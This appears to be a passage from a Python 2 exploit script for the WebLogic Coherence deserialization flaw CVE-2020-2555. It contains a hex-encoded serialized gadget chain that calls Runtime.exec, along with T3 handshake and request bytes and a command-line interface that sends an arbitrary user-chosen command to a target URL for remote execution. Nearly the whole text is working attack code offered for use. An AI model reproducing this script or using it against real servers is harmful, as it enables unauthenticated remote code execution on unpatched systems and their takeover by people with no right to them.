    payload_start = 'aced00057372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000037372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e000578700000004374002079736f73657269616c2e7061796c6f6164732e4356455f323032305f323535357400124356455f323032305f323535352e6a6176617400096765744f626a6563747371007e000b0000000171007e000d71007e000e71007e000f7371007e000b0000002274001979736f73657269616c2e47656e65726174655061796c6f616474001447656e65726174655061796c6f61642e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e00077872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001a7873720024636f6d2e74616e676f736f6c2e7574696c2e66696c7465722e4c696d697446696c74657299022596d7b4595302000649000b6d5f635061676553697a654900076d5f6e506167654c000c6d5f636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b4c00086d5f66696c74657274001a4c636f6d2f74616e676f736f6c2f7574696c2f46696c7465723b4c000f6d5f6f416e63686f72426f74746f6d71007e00014c000c6d5f6f416e63686f72546f7071007e0001787000000000000000007372002c636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e436861696e6564457874726163746f72889f81b0945d5b7f02000078720036636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374436f6d706f73697465457874726163746f72086b3d8c05690f440200015b000c6d5f61457874726163746f727400235b4c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b7872002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374457874726163746f72658195303e7238210200014900096d5f6e546172676574787000000000757200235b4c636f6d2e74616e676f736f6c2e7574696c2e56616c7565457874726163746f723b2246204735c4a0fe0200007870000000047372002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4964656e74697479457874726163746f72936ee080c7259c4b0200007871007e0022000000007372002f636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e5265666c656374696f6e457874726163746f72ee7ae995c02fb4a20200025b00096d5f616f506172616d7400135b4c6a6176612f6c616e672f4f626a6563743b4c00096d5f734d6574686f6471007e00057871007e002200000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65707400096765744d6574686f647371007e0028000000007571007e002b000000027070740006696e766f6b657371007e0028000000007571007e002b0000000174'
39
    payload_lenhex = '{:04x}'.format(len(cmd))
40
    payload_cmdhex = binascii.b2a_hex(cmd)
41
    payload_end = '7400046578656370767200116a6176612e6c616e672e52756e74696d650000000000000000000000787070'
42
    payload = payload_start + payload_lenhex + payload_cmdhex + payload_end
43
    return payload
44
45
class payloadtest(object):
46
    def __init__(self):
47
48
        self.vuln = 'cve_2020_2555'
49
50
    def t3handshake(self,sock,server_addr):
51
        sock.connect(server_addr)
52
        sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
53
        time.sleep(1)
54
        data = sock.recv(1024)
55
        #print data
56
        #print 'handshake successful'
57
58
    def buildT3RequestObject(self,sock,port):
59
        data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
60
        data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b19ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'
61
        data3 = '1a7727000d3234322e323134'
62
        data4 = '2e312e32353461863d1d0000000078'
63
        for d in [data1,data2,data3,data4]:
64
            sock.send(d.decode('hex'))
65
        time.sleep(2)
66
        #print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))
67
68
    def sendEvilObjData(self,sock,data):
69
        payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
70
        payload+=data
71
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
72
        payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
73
        sock.send(payload.decode('hex'))
74
        time.sleep(2)
75
        sock.send(payload.decode('hex'))
76
        res = ''
77
        n=1
78
        try:
79
            while True:
80
                n += 1
81
                res += sock.recv(4096)
82
                time.sleep(0.1)
83
                if(n>15):
84
                    break
85
        except Exception as e:
86
            pass
87
        return res
88
89
    def check(self, url, cmd,timeout, proxies=globalProxies, **args):
90
        (proto, ip, port, uri) = parseUrl(url)
91
92
        server_addr = (ip, int(port))
93
        if proto == 'https':
94
            sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
95
        else:
96
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
97
        sock.settimeout(timeout)
98
        try:
99
            self.t3handshake(sock,server_addr)
100
            self.buildT3RequestObject(sock,port)
101
            payload = CVE_2020_2555(cmd)
102
            resp = self.sendEvilObjData(sock,payload)
103
104
            print ('[+] Payload send succeed! Please check.')
105
106
            return True
107
        except Exception as e:
108
            print ('[-] Failed! Exception:{}'.format(str(e)))
109
110
        return False
111
112
def poc(url,cmd):
113
    x = payloadtest()
114
    return x.check(url, cmd,20)
115
116
117
if __name__ == '__main__':
118
    parser = argparse.ArgumentParser(description='Weblogic cve-2020-2555 Exp',
119
                                     usage='[*] use "python %(prog)s --help" for more information',
120
                                     formatter_class=argparse.RawTextHelpFormatter)
121
    parser.add_argument("-u", "--url",
122
                        dest="url",
123
                        help="the url to check"
124
                        )
125
126
    parser.add_argument("-c", "--cmd",
127
                        dest="cmd",
128
                        help="the cmd to run on the target"
129
                        )
130
    args = parser.parse_args()
131
    if not args.url or not args.cmd:
132
        sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-2883_cmd.py -u http://127.0.0.1:7001 -c calc')
133
    poc(args.url, args.cmd)